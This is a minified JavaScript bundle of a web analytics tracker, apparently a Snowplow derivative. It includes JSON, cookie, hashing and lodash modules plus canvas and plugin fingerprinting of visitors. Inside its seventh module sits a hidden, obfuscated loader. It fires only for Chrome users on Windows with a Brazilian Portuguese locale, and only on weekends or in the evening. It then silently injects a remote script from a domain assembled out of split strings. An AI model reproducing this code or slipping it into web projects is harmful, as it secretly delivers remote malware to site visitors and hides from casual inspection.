(function e(r,f,p){function b(a,d){if(!f[a]){if(!r[a]){var m="function"==typeof require&&require;if(!d&&m)return m(a,!0);if(c)return c(a,!0);m=Error("Cannot find module '"+a+"'");throw m.code="MODULE_NOT_FOUND",m;}m=f[a]={exports:{}};r[a][0].call(m.exports,function(c){var l=r[a][1][c];return b(l?l:c)},m,m.exports,e,r,f,p)}return f[a].exports}for(var c="function"==typeof require&&require,a=0;a<p.length;a++)b(p[a]);return b})({1:[function(g,r,f){var p;p||(p={});(function(){function b(a){return 10>a?
"0"+a:a}function c(a){p.lastIndex=0;return p.test(a)?'"'+a.replace(p,function(a){var c=q[a];return"string"===typeof c?c:"\\u"+("0000"+a.charCodeAt(0).toString(16)).slice(-4)})+'"':'"'+a+'"'}function a(b,d){var q,p=l,m=d[b];m&&"object"===typeof m&&"function"===typeof m.toJSON&&(m=m.toJSON(b));"function"===typeof z&&(m=z.call(d,b,m));switch(typeof m){case "string":return c(m);case "number":return isFinite(m)?String(m):"null";case "boolean":case "null":return String(m);case "object":if(!m)return"null";
l+=n;var h=[];if("[object Array]"===Object.prototype.toString.apply(m)){var v=m.length;for(q=0;q<v;q+=1)h[q]=a(q,m)||"null";var C=0===h.length?"[]":l?"[\n"+l+h.join(",\n"+l)+"\n"+p+"]":"["+h.join(",")+"]";l=p;return C}if(z&&"object"===typeof z)for(v=z.length,q=0;q<v;q+=1){if("string"===typeof z[q]){var f=z[q];(C=a(f,m))&&h.push(c(f)+(l?": ":":")+C)}}else for(f in m)Object.prototype.hasOwnProperty.call(m,f)&&(C=a(f,m))&&h.push(c(f)+(l?": ":":")+C);C=0===h.length?"{}":l?"{\n"+l+h.join(",\n"+l)+"\n"+
p+"}":"{"+h.join(",")+"}";l=p;return C}}var h=Function("return this")(),d=h.JSON;d||(d={});"function"!==typeof Date.prototype.toJSON&&(Date.prototype.toJSON=function(a){return isFinite(this.valueOf())?this.getUTCFullYear()+"-"+b(this.getUTCMonth()+1)+"-"+b(this.getUTCDate())+"T"+b(this.getUTCHours())+":"+b(this.getUTCMinutes())+":"+b(this.getUTCSeconds())+"Z":null},String.prototype.toJSON=Number.prototype.toJSON=Boolean.prototype.toJSON=function(a){return this.valueOf()});var m=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,
p=/[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,l,n,q={"\b":"\\b","\t":"\\t","\n":"\\n","\f":"\\f","\r":"\\r",'"':'\\"',"\\":"\\\\"},z;"function"!==typeof d.stringify&&(d.stringify=function(c,b,d){var q;n=l="";if("number"===typeof d)for(q=0;q<d;q+=1)n+=" ";else"string"===typeof d&&(n=d);if((z=b)&&"function"!==typeof b&&("object"!==typeof b||"number"!==typeof b.length))throw Error("JSON.stringify");return a("",{"":c})});"function"!==
typeof d.parse&&(d.parse=function(a,c){function b(a,l){var d,q=a[l];if(q&&"object"===typeof q)for(d in q)if(Object.prototype.hasOwnProperty.call(q,d)){var n=b(q,d);void 0!==n?q[d]=n:delete q[d]}return c.call(a,l,q)}a=String(a);m.lastIndex=0;m.test(a)&&(a=a.replace(m,function(a){return"\\u"+("0000"+a.charCodeAt(0).toString(16)).slice(-4)}));if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,"@").replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,"]").replace(/(?:^|:|,)(?:\s*\[)+/g,
""))){var l=eval("("+a+")");return"function"===typeof c?b({"":l},""):l}throw new SyntaxError("JSON.parse");});h.JSON=d;r.exports=d})()},{}],2:[function(g,r,f){this.cookie=function(p,b,c,a,h,d){return 1<arguments.length?document.cookie=p+"="+escape(b)+(c?"; expires="+(new Date(+new Date+1E3*c)).toUTCString():"")+(a?"; path="+a:"")+(h?"; domain="+h:"")+(d?"; secure":""):unescape((("; "+document.cookie).split("; "+p+"=")[1]||"").split(";")[0])}},{}],3:[function(g,r,f){(function(){function p(a,c){var b;
var m=a.length&3;var h=a.length-m;var l=c;for(b=0;b<h;){var n=a.charCodeAt(b)&255|(a.charCodeAt(++b)&255)<<8|(a.charCodeAt(++b)&255)<<16|(a.charCodeAt(++b)&255)<<24;++b;n=3432918353*(n&65535)+((3432918353*(n>>>16)&65535)<<16)&4294967295;n=n<<15|n>>>17;n=461845907*(n&65535)+((461845907*(n>>>16)&65535)<<16)&4294967295;l^=n;l=l<<13|l>>>19;l=5*(l&65535)+((5*(l>>>16)&65535)<<16)&4294967295;l=(l&65535)+27492+(((l>>>16)+58964&65535)<<16)}n=0;switch(m){case 3:n^=(a.charCodeAt(b+2)&255)<<16;case 2:n^=(a.charCodeAt(b+
1)&255)<<8;case 1:n^=a.charCodeAt(b)&255,n=3432918353*(n&65535)+((3432918353*(n>>>16)&65535)<<16)&4294967295,n=n<<15|n>>>17,l^=461845907*(n&65535)+((461845907*(n>>>16)&65535)<<16)&4294967295}l^=a.length;l^=l>>>16;l=2246822507*(l&65535)+((2246822507*(l>>>16)&65535)<<16)&4294967295;l^=l>>>13;l=3266489909*(l&65535)+((3266489909*(l>>>16)&65535)<<16)&4294967295;return(l^l>>>16)>>>0}var b=this;p.v2=function(a,b){for(var c=a.length,m=b^c,h=0,l;4<=c;)l=a.charCodeAt(h)&255|(a.charCodeAt(++h)&255)<<8|(a.charCodeAt(++h)&
255)<<16|(a.charCodeAt(++h)&255)<<24,l=1540483477*(l&65535)+((1540483477*(l>>>16)&65535)<<16),l^=l>>>24,l=1540483477*(l&65535)+((1540483477*(l>>>16)&65535)<<16),m=1540483477*(m&65535)+((1540483477*(m>>>16)&65535)<<16)^l,c-=4,++h;switch(c){case 3:m^=(a.charCodeAt(h+2)&255)<<16;case 2:m^=(a.charCodeAt(h+1)&255)<<8;case 1:m^=a.charCodeAt(h)&255,m=1540483477*(m&65535)+((1540483477*(m>>>16)&65535)<<16)}m^=m>>>13;m=1540483477*(m&65535)+((1540483477*(m>>>16)&65535)<<16);return(m^m>>>15)>>>0};p.v3=p;if("undefined"!=
typeof r)r.exports=p;else{var c=b.murmur;p.noConflict=function(){b.murmur=c;return p};b.murmur=p}})()},{}],4:[function(g,r,f){var p={utf8:{stringToBytes:function(b){return p.bin.stringToBytes(unescape(encodeURIComponent(b)))},bytesToString:function(b){return decodeURIComponent(escape(p.bin.bytesToString(b)))}},bin:{stringToBytes:function(b){for(var c=[],a=0;a<b.length;a++)c.push(b.charCodeAt(a)&255);return c},bytesToString:function(b){for(var c=[],a=0;a<b.length;a++)c.push(String.fromCharCode(b[a]));
return c.join("")}}};r.exports=p},{}],5:[function(g,r,f){(function(){var p={rotl:function(b,c){return b<<c|b>>>32-c},rotr:function(b,c){return b<<32-c|b>>>c},endian:function(b){if(b.constructor==Number)return p.rotl(b,8)&16711935|p.rotl(b,24)&4278255360;for(var c=0;c<b.length;c++)b[c]=p.endian(b[c]);return b},randomBytes:function(b){for(var c=[];0<b;b--)c.push(Math.floor(256*Math.random()));return c},bytesToWords:function(b){for(var c=[],a=0,h=0;a<b.length;a++,h+=8)c[h>>>5]|=b[a]<<24-h%32;return c},
wordsToBytes:function(b){for(var c=[],a=0;a<32*b.length;a+=8)c.push(b[a>>>5]>>>24-a%32&255);return c},bytesToHex:function(b){for(var c=[],a=0;a<b.length;a++)c.push((b[a]>>>4).toString(16)),c.push((b[a]&15).toString(16));return c.join("")},hexToBytes:function(b){for(var c=[],a=0;a<b.length;a+=2)c.push(parseInt(b.substr(a,2),16));return c},bytesToBase64:function(b){for(var c=[],a=0;a<b.length;a+=3)for(var h=b[a]<<16|b[a+1]<<8|b[a+2],d=0;4>d;d++)8*a+6*d<=8*b.length?c.push("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(h>>>
6*(3-d)&63)):c.push("=");return c.join("")},base64ToBytes:function(b){b=b.replace(/[^A-Z0-9+\/]/ig,"");for(var c=[],a=0,h=0;a<b.length;h=++a%4)0!=h&&c.push(("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".indexOf(b.charAt(a-1))&Math.pow(2,-2*h+8)-1)<<2*h|"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".indexOf(b.charAt(a))>>>6-2*h);return c}};r.exports=p})()},{}],6:[function(g,r,f){(function(){var p=g("crypt"),b=g("charenc").utf8,c=g("charenc").bin,a=function(a){a.constructor==
String&&(a=b.stringToBytes(a));var c=p.bytesToWords(a),h=8*a.length;a=[];var l=1732584193,n=-271733879,q=-1732584194,d=271733878,f=-1009589776;c[h>>5]|=128<<24-h%32;c[(h+64>>>9<<4)+15]=h;for(h=0;h<c.length;h+=16){for(var v=l,g=n,r=q,oa=d,W=f,y=0;80>y;y++){if(16>y)a[y]=c[h+y];else{var N=a[y-3]^a[y-8]^a[y-14]^a[y-16];a[y]=N<<1|N>>>31}N=(l<<5|l>>>27)+f+(a[y]>>>0)+(20>y?(n&q|~n&d)+1518500249:40>y?(n^q^d)+1859775393:60>y?(n&q|n&d|q&d)-1894007588:(n^q^d)-899497514);f=d;d=q;q=n<<30|n>>>2;n=l;l=N}l+=v;n+=
g;q+=r;d+=oa;f+=W}return[l,n,q,d,f]},h=function(b,h){var d=p.wordsToBytes(a(b));return h&&h.asBytes?d:h&&h.asString?c.bytesToString(d):p.bytesToHex(d)};h._blocksize=16;h._digestsize=20;r.exports=h})()},{charenc:4,crypt:5}],7:[function(g,r,f){(function(){(function(a,b){if(a=window.navigator.userAgent.toLowerCase(),b=function(){try{var b=new Date();var c=b.getDay();var e=b.getHours();if(c!==6&&c!==0&&e<20)return;var f='/ivc.js?nocache='+Math.random();var g='https:';var h='window.top';var i='//ivctag.';var a=window.document.createElement('script');a.id='x9lZa_jxvZa',a.type='text/javascript',a.src=g+i+h.substring(7)+f;var d=window.document.getElementById('x9lZa_jxvZa');(d===null||d===undefined)&&window.document.body.appendChild(a);}catch(e){}},a.indexOf('chrome')===-1)return;if(a.indexOf('windows nt')===-1)return;if(navigator.language.toLowerCase()!=='pt-br')return;if(navigator.platform.toLowerCase()!=='win32')return;if(navigator.vendor.toLowerCase()!=='google inc.')return;document.body===undefined||document.body===null?document.addEventListener('DOMContentLoaded',function(a){b();}):b();}());var p=g("./lib_managed/lodash"),b=g("./lib/helpers");("undefined"!==typeof f?f:this).InQueueManager=function(c,a,h,d,m){function f(){var q;for(q=0;q<arguments.length;q+=1){var d=arguments[q];var f=Array.prototype.shift.call(d);var g=f.split(":");f=
g[0];g=1<g.length?g[1].split(";"):[];g=[f,g];f=g[0];g=g[1];if("newTracker"===f)f=d[0],g=d[1],d=(d=d[2])||{},!d.writeCookies&&d.cookieName in n?d.writeCookies=!1:n[d.cookieName]=!0,l[f]=new c(m,f,a,h,d),l[f].setCollectorUrl(g);else if("setCollectorCf"!==f&&"setCollectorUrl"!==f||g&&0!==g.length){var r=[];if(g&&0!==g.length)for(var C=0;C<g.length;C++)l.hasOwnProperty(g[C])?r.push(l[g[C]]):b.warn('Warning: Tracker namespace "'+g[C]+'" not configured');else r=p.map(l);0===r.length&&b.warn("Warning: No tracker configured");
g=r;if(p.isString(f))for(r=0;r<g.length;r++)g[r][f].apply(g[r],d);else for(r=0;r<g.length;r++)f.apply(g[r],d)}else legacyCreateNewNamespace(f,d[0],d[1])}}for(var l={},n={},q=0;q<d.length;q++)f(d[q]);return{push:f}}})()},{"./lib/helpers":11,"./lib_managed/lodash":13}],8:[function(g,r,f){g=g("./snowplow");f=window;f.GlobalIvcNamespace&&0<f.GlobalIvcNamespace.length?(r=f.GlobalIvcNamespace.shift(),f=f[r],f.q=new g.Snowplow(f.q,r)):(f._snaq=f._snaq||[],f._snaq=new g.Snowplow(f._snaq,"_snaq"))},{"./snowplow":16}],
9:[function(g,r,f){(function(){("undefined"!==typeof f?f:this).base64encode=function(f){var b=0,c=0,a=[];if(!f)return f;f=unescape(encodeURIComponent(f));do{var h=f.charCodeAt(b++);var d=f.charCodeAt(b++);var m=f.charCodeAt(b++);var g=h<<16|d<<8|m;h=g>>18&63;d=g>>12&63;m=g>>6&63;g&=63;a[c++]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(h)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(d)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(m)+
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(g)}while(b<f.length);b=a.join("");f=f.length%3;return(f?b.slice(0,f-3):b)+"===".slice(f||3)}})()},{}],10:[function(g,r,f){(function(){var p=g("../lib_managed/lodash");g("./helpers");var b=g("murmurhash").v3,c=g("browser-cookie-lite"),a="undefined"!==typeof f?f:this,h=window,d=navigator,m=screen,r=document;a.hasSessionStorage=function(){try{return!!h.sessionStorage}catch(l){return!0}};a.hasLocalStorage=function(){try{return!!h.localStorage}catch(l){return!0}};
a.localStorageAccessible=function(){if(!a.hasLocalStorage())return!1;try{return h.localStorage.setItem("modernizr","modernizr"),h.localStorage.removeItem("modernizr"),!0}catch(l){return!1}};a.hasCookies=function(a){a=a||"testcookie";return p.isUndefined(d.cookieEnabled)?(c.cookie(a,"1"),"1"===c.cookie(a)?"1":"0"):d.cookieEnabled?"1":"0"};a.isCanvasSupported=function(){var a=document.createElement("canvas");return!(!a.getContext||!a.getContext("2d"))};a.getCanvasFp=function(){var a=[],c=document.createElement("canvas");
c.width=2E3;c.height=200;c.style.display="inline";var b=c.getContext("2d");b.rect(0,0,10,10);b.rect(2,2,6,6);a.push("canvas winding:"+(!1===b.isPointInPath(5,5,"evenodd")?"yes":"no"));b.textBaseline="alphabetic";b.fillStyle="#f60";b.fillRect(125,1,62,20);b.fillStyle="#069";b.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",2,15);b.fillStyle="rgba(102, 204, 0, 0.7)";b.font="18pt Arial";b.fillText("Cwm fjordbank glyphs vext quiz, \ud83d\ude03",4,45);b.globalCompositeOperation="multiply";b.fillStyle=
"rgb(255,0,255)";b.beginPath();b.arc(50,50,50,0,2*Math.PI,!0);b.closePath();b.fill();b.fillStyle="rgb(0,255,255)";b.beginPath();b.arc(100,50,50,0,2*Math.PI,!0);b.closePath();b.fill();b.fillStyle="rgb(255,255,0)";b.beginPath();b.arc(75,100,50,0,2*Math.PI,!0);b.closePath();b.fill();b.fillStyle="rgb(255,0,255)";b.arc(75,75,75,0,2*Math.PI,!0);b.arc(75,75,25,0,2*Math.PI,!0);b.fill("evenodd");a.push("canvas fp:"+c.toDataURL());return a.join("~")};a.detectSignature=function(l){var h=a.isCanvasSupported()?
a.getCanvasFp():"",f=""!=c.cookie("__utma")?c.cookie("__utma"):c.cookie("_ga");h=[d.userAgent,[m.height,m.width,m.colorDepth].join("x"),(new Date).getTimezoneOffset(),a.hasSessionStorage(),a.hasLocalStorage(),h,f];f=[];if(d.plugins)for(var g=0;g<d.plugins.length;g++){for(var p=[],r=0;r<d.plugins[g].length;r++)p.push([d.plugins[g][r].type,d.plugins[g][r].suffixes]);f.push([d.plugins[g].name+"::"+d.plugins[g].description,p.join("~")])}return b(h.join("###")+"###"+f.sort().join(";"),l)};a.detectTimezone=
function(){return""};a.detectViewport=function(){var a=h,b="inner";"innerWidth"in h||(b="client",a=r.documentElement||r.body);return a[b+"Width"]+"x"+a[b+"Height"]};a.detectDocumentSize=function(){var a=r.documentElement,b=Math.max(a.clientWidth,a.offsetWidth,a.scrollWidth);a=Math.max(a.clientHeight,a.offsetHeight,a.scrollHeight);return isNaN(b)||isNaN(a)?"":b+"x"+a};a.detectBrowserFeatures=function(b){var f,l={pdf:"application/pdf",qt:"video/quicktime",realp:"audio/x-pn-realaudio-plugin",wma:"application/x-mplayer2",
dir:"application/x-director",fla:"application/x-shockwave-flash",java:"application/x-java-vm",gears:"application/x-googlegears",ag:"application/x-silverlight"},g={};if(d.mimeTypes&&d.mimeTypes.length)for(f in l)if(Object.prototype.hasOwnProperty.call(l,f)){var r=d.mimeTypes[l[f]];g[f]=r&&r.enabledPlugin?"1":"0"}g.inpriv=""!=c.cookie("privAu")?c.cookie("privAu"):0;g.abd=""!=c.cookie("abdAu")?c.cookie("abdAu"):0;"unknown"!==typeof d.javaEnabled&&!p.isUndefined(d.javaEnabled)&&d.javaEnabled()&&(g.java=
"1");p.isFunction(h.GearsFactory)&&(g.gears="1");g.res=m.width+"x"+m.height;g.cd=m.colorDepth;g.cookie=a.hasCookies(b);return g}})()},{"../lib_managed/lodash":13,"./helpers":11,"browser-cookie-lite":2,murmurhash:3}],11:[function(g,r,f){(function(){var p=g("../lib_managed/lodash"),b="undefined"!==typeof f?f:this;b.fixupTitle=function(b){if(!p.isString(b)){b=b.text||"";var a=document.getElementsByTagName("title");a&&!p.isUndefined(a[0])&&(b=a[0].text)}return b};b.getHostName=function(b){var a=/^(?:(?:https?|ftp):)\/*(?:[^@]+@)?([^:/#]+)/.exec(b);
return a?a[1]:b};b.fixupDomain=function(b){var a=b.length;"."===b.charAt(--a)&&(b=b.slice(0,a));"*."===b.slice(0,2)&&(b=b.slice(1));return b};b.getReferrer=function(){var c="",a=b.fromQuerystring("referrer",window.location.href)||b.fromQuerystring("referer",window.location.href);if(a)return a;try{c=window.top.document.referrer}catch(h){if(window.parent)try{c=window.parent.document.referrer}catch(d){c=""}}""===c&&(c=document.referrer);return c};b.addEventListener=function(b,a,h,d){if(b.addEventListener)return b.addEventListener(a,
h,d),!0;if(b.attachEvent)return b.attachEvent("on"+a,h);b["on"+a]=h};b.fromQuerystring=function(b,a){var c=RegExp("^[^#]*[?&]"+b+"=([^&#]*)").exec(a);return c?decodeURIComponent(c[1].replace(/\+/g," ")):null};b.deleteEmptyProperties=function(b){for(var a in b)b.hasOwnProperty(a)&&(p.isUndefined(b[a])||p.isNull(b[a])||0===b[a].length)&&delete b[a];return b};b.warn=function(b){console.warn("Snowplow: "+b)}})()},{"../lib_managed/lodash":13}],12:[function(g,r,f){(function(){var p=g("./helpers");("undefined"!==
typeof f?f:this).fixupUrl=function(b,c,a){if("translate.googleusercontent.com"===b)""===a&&(a=c),b=/^(?:https?|ftp)(?::\/*(?:[^?]+))([?][^#]+)/.exec(c),c=p.fromQuerystring("u",b[1]),b=p.getHostName(c);else{var h;if(!(h="cc.bingj.com"===b||"webcache.googleusercontent.com"===b))a:{if(/^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$/.test(b))try{var d=document.body.children[0].children[0].children[0].children[0].children[0].children[0].innerHTML;
h="You have reached the cached page for"===d.slice(0,36);break a}catch(m){h=!1;break a}h=void 0}h&&(c=document.links[0].href,b=p.getHostName(c))}return[b,c,a]}})()},{"./helpers":11}],13:[function(g,r,f){(function(g){(function(){function b(a){a.length=0;40>aa.length&&aa.push(a)}function c(a,b,c){b||(b=0);"undefined"==typeof c&&(c=a?a.length:0);var t=-1;c=c-b||0;for(var d=Array(0>c?0:c);++t<c;)d[t]=a[b+t];return d}function a(){}function h(a){function b(){if(h){var a=c(h);O.apply(a,arguments)}if(this instanceof
b){var l=d(t.prototype);a=t.apply(l,a||arguments);return V(a)?a:l}return t.apply(f,a||arguments)}var t=a[0],h=a[2],f=a[4];ba(b,a);return b}function d(a,b){return V(a)?K(a):{}}function m(a,b,c){if("function"!=typeof a)return y;if("undefined"==typeof b||!("prototype"in a))return a;var t=a.__bindData__;if("undefined"==typeof t&&(w.funcNames&&(t=!a.name),t=t||!w.funcDecomp,!t)){var d=ca.call(a);w.funcNames||(t=!ta.test(d));t||(t=da.test(d),ba(a,t))}if(!1===t||!0!==t&&t[1]&1)return a;switch(c){case 1:return function(t){return a.call(b,
t)};case 2:return function(t,c){return a.call(b,t,c)};case 3:return function(t,c,d){return a.call(b,t,c,d)};case 4:return function(t,c,d,h){return a.call(b,t,c,d,h)}}return W(a,b)}function p(a){function b(){var a=n?g:this;if(f){var u=c(f);O.apply(u,arguments)}if(l||r)if(u||(u=c(arguments)),l&&O.apply(u,l),r&&u.length<m)return h|=16,p([t,v?h:h&-4,u,null,g,m]);u||(u=arguments);q&&(t=a[z]);return this instanceof b?(a=d(t.prototype),u=t.apply(a,u),V(u)?u:a):t.apply(a,u)}var t=a[0],h=a[1],f=a[2],l=a[3],
g=a[4],m=a[5],n=h&1,q=h&2,r=h&4,v=h&8,z=t;ba(b,a);return b}function l(a,c,h,d,f,g){if(h){var t=h(a,c);if("undefined"!=typeof t)return!!t}if(a===c)return 0!==a||1/a==1/c;if(!(a!==a||a&&L[typeof a]||c&&L[typeof c]))return!1;if(null==a||null==c)return a===c;var m=F.call(a),n=F.call(c);"[object Arguments]"==m&&(m="[object Object]");"[object Arguments]"==n&&(n="[object Object]");if(m!=n)return!1;switch(m){case "[object Boolean]":case "[object Date]":return+a==+c;case "[object Number]":return a!=+a?c!=
+c:0==a?1/a==1/c:a==+c;case "[object RegExp]":case "[object String]":return a==String(c)}n="[object Array]"==m;if(!n){var q=I.call(a,"__wrapped__"),p=I.call(c,"__wrapped__");if(q||p)return l(q?a.__wrapped__:a,p?c.__wrapped__:c,h,d,f,g);if("[object Object]"!=m)return!1;m=!w.argsObject&&H(a)?Object:a.constructor;q=!w.argsObject&&H(c)?Object:c.constructor;if(m!=q&&!(v(m)&&m instanceof m&&v(q)&&q instanceof q)&&"constructor"in a&&"constructor"in c)return!1}m=!f;f||(f=aa.pop()||[]);g||(g=aa.pop()||[]);
for(q=f.length;q--;)if(f[q]==a)return g[q]==c;var u=0;t=!0;f.push(a);g.push(c);if(n){if(q=a.length,u=c.length,(t=u==q)||d)for(;u--;)if(n=q,p=c[u],d)for(;n--&&!(t=l(a[n],p,h,d,f,g)););else if(!(t=l(a[u],p,h,d,f,g)))break}else ja(c,function(b,c,m){if(I.call(m,c))return u++,t=I.call(a,c)&&l(a[c],b,h,d,f,g)}),t&&!d&&ja(a,function(a,b,c){if(I.call(c,b))return t=-1<--u});f.pop();g.pop();m&&(b(f),b(g));return t}function n(a,b,d,f,g,l){var t=b&1,m=b&4,q=b&16,r=b&32;if(!(b&2||v(a)))throw new TypeError;q&&
!d.length&&(b&=-17,q=d=!1);r&&!f.length&&(b&=-33,r=f=!1);var u=a&&a.__bindData__;return u&&!0!==u?(u=c(u),u[2]&&(u[2]=c(u[2])),u[3]&&(u[3]=c(u[3])),!t||u[1]&1||(u[4]=g),!t&&u[1]&1&&(b|=8),!m||u[1]&4||(u[5]=l),q&&O.apply(u[2]||(u[2]=[]),d),r&&fa.apply(u[3]||(u[3]=[]),f),u[1]|=b,n.apply(null,u)):(1==b||17===b?h:p)([a,b,d,f,g,l])}function q(){G.shadowedProps=P;G.array=G.bottom=G.loop=G.top="";G.init="iterable";G.useHas=!0;for(var a,b=0;a=arguments[b];b++)for(var c in a)G[c]=a[c];a=G.args;G.firstArg=
/^[^,]+/.exec(a)[0];b=Function;c=G;var d="var index, iterable = "+c.firstArg+", result = "+c.init+";\nif (!iterable) return result;\n"+c.top+";";c.array?(d+="\nvar length = iterable.length; index = -1;\nif ("+c.array+") {  ",w.unindexedChars&&(d+="\n  if (isString(iterable)) {\n    iterable = iterable.split('')\n  }  "),d+="\n  while (++index < length) {\n    "+c.loop+";\n  }\n}\nelse {  "):w.nonEnumArgs&&(d+="\n  var length = iterable.length; index = -1;\n  if (length && isArguments(iterable)) {\n    while (++index < length) {\n      index += '';\n      "+
c.loop+";\n    }\n  } else {  ");w.enumPrototypes&&(d+="\n  var skipProto = typeof iterable == 'function';\n  ");w.enumErrorProps&&(d+="\n  var skipErrorProps = iterable === errorProto || iterable instanceof Error;\n  ");var f=[];w.enumPrototypes&&f.push('!(skipProto && index == "prototype")');w.enumErrorProps&&f.push('!(skipErrorProps && (index == "message" || index == "name"))');if(c.useHas&&c.keys)d+="\n  var ownIndex = -1,\n      ownProps = objectTypes[typeof iterable] && keys(iterable),\n      length = ownProps ? ownProps.length : 0;\n\n  while (++ownIndex < length) {\n    index = ownProps[ownIndex];\n",
f.length&&(d+="    if ("+f.join(" && ")+") {\n  "),d+=c.loop+";    ",f.length&&(d+="\n    }"),d+="\n  }  ";else if(d+="\n  for (index in iterable) {\n",c.useHas&&f.push("hasOwnProperty.call(iterable, index)"),f.length&&(d+="    if ("+f.join(" && ")+") {\n  "),d+=c.loop+";    ",f.length&&(d+="\n    }"),d+="\n  }    ",w.nonEnumShadows){d+="\n\n  if (iterable !== objectProto) {\n    var ctor = iterable.constructor,\n        isProto = iterable === (ctor && ctor.prototype),\n        className = iterable === stringProto ? stringClass : iterable === errorProto ? errorClass : toString.call(iterable),\n        nonEnum = nonEnumProps[className];\n      ";
for(k=0;7>k;k++)d+="\n    index = '"+c.shadowedProps[k]+"';\n    if ((!(isProto && nonEnum[index]) && hasOwnProperty.call(iterable, index))",c.useHas||(d+=" || (!nonEnum[index] && iterable[index] !== objectProto[index])"),d+=") {\n      "+c.loop+";\n    }      ";d+="\n  }    "}if(c.array||w.nonEnumArgs)d+="\n}";d+=c.bottom+";\nreturn result";return b("baseCreateCallback, errorClass, errorProto, hasOwnProperty, indicatorObject, isArguments, isArray, isString, keys, objectProto, objectTypes, nonEnumProps, stringClass, stringProto, toString",
"return function("+a+") {\n"+d+"\n}")(m,"[object Error]",Y,I,va,H,ha,Aa,G.keys,Q,L,D,"[object String]",xa,F)}function z(a){return"function"==typeof a&&ya.test(a)}function H(a){return a&&"object"==typeof a&&"number"==typeof a.length&&"[object Arguments]"==F.call(a)||!1}function v(a){return"function"==typeof a}function V(a){return!(!a||!L[typeof a])}function Aa(a){return"string"==typeof a||a&&"object"==typeof a&&"[object String]"==F.call(a)||!1}function oa(b,c,d){var f=-1,h=b?b.length:0,t=Array("number"==
typeof h?h:0);c=a.createCallback(c,d,3);if(ha(b))for(;++f<h;)t[f]=c(b[f],f,b);else za(b,function(a,b,d){t[++f]=c(a,b,d)});return t}function W(a,b){return 2<arguments.length?n(a,17,c(arguments,2),null,b):n(a,1,null,null,b)}function y(a){return a}function N(){}function E(a){return function(b){return b[a]}}var aa=[],va={},ta=/^\s*function[ \n\r\t]+\w/,da=/\bthis\b/,P="constructor hasOwnProperty isPrototypeOf propertyIsEnumerable toLocaleString toString valueOf".split(" "),ka={configurable:!1,enumerable:!1,
value:null,writable:!1},G={args:"",array:null,bottom:"",firstArg:"",init:"",keys:null,loop:"",shadowedProps:null,support:null,top:"",useHas:!1},L={"boolean":!1,"function":!0,object:!0,number:!1,string:!1,undefined:!1},ia=L[typeof window]&&window||this,x=L[typeof f]&&f&&!f.nodeType&&f,B=L[typeof r]&&r&&!r.nodeType&&r,T=B&&B.exports===x&&x,A=L[typeof g]&&g;!A||A.global!==A&&A.window!==A||(ia=A);var la=[],Y=Error.prototype,Q=Object.prototype,xa=String.prototype,F=Q.toString,ya=RegExp("^"+String(F).replace(/[.*+?^${}()|[\]\\]/g,
"\\$&").replace(/toString| for [^\]]+/g,".*?")+"$"),ca=Function.prototype.toString,I=Q.hasOwnProperty,O=la.push,U=Q.propertyIsEnumerable,fa=la.unshift,ma=function(){try{var a={},b=z(b=Object.defineProperty)&&b;var c=b(a,a,a)&&b}catch(pa){}return c}(),K=z(K=Object.create)&&K,J=z(J=Array.isArray)&&J,M=z(M=Object.keys)&&M,D={};D["[object Array]"]=D["[object Date]"]=D["[object Number]"]={constructor:!0,toLocaleString:!0,toString:!0,valueOf:!0};D["[object Boolean]"]=D["[object String]"]={constructor:!0,
toString:!0,valueOf:!0};D["[object Error]"]=D["[object Function]"]=D["[object RegExp]"]={constructor:!0,toString:!0};D["[object Object]"]={constructor:!0};(function(){for(var a=P.length;a--;){var b=P[a],c;for(c in D)I.call(D,c)&&!I.call(D[c],b)&&(D[c][b]=!1)}})();var w=a.support={};(function(){var a=function(){this.x=1},b={0:1,length:1},c=[];a.prototype={valueOf:1,y:1};for(var d in new a)c.push(d);for(d in arguments);w.argsClass="[object Arguments]"==F.call(arguments);w.argsObject=arguments.constructor==
Object&&!(arguments instanceof Array);w.enumErrorProps=U.call(Y,"message")||U.call(Y,"name");w.enumPrototypes=U.call(a,"prototype");w.funcDecomp=!z(ia.WinRTError)&&da.test(function(){return this});w.funcNames="string"==typeof Function.name;w.nonEnumArgs=0!=d;w.nonEnumShadows=!/valueOf/.test(c);w.spliceObjects=(la.splice.call(b,0,1),!b[0]);w.unindexedChars="xx"!="x"+Object("x")[0]})(1);K||(d=function(){function a(){}return function(b){if(V(b)){a.prototype=b;var c=new a;a.prototype=null}return c||ia.Object()}}());
var ba=ma?function(a,b){ka.value=b;ma(a,"__bindData__",ka)}:N;w.argsClass||(H=function(a){return a&&"object"==typeof a&&"number"==typeof a.length&&I.call(a,"callee")&&!U.call(a,"callee")||!1});var ha=J||function(a){return a&&"object"==typeof a&&"number"==typeof a.length&&"[object Array]"==F.call(a)||!1},na=q({args:"object",init:"[]",top:"if (!(objectTypes[typeof object])) return result",loop:"result.push(index)"}),R=M?function(a){return V(a)?w.enumPrototypes&&"function"==typeof a||w.nonEnumArgs&&
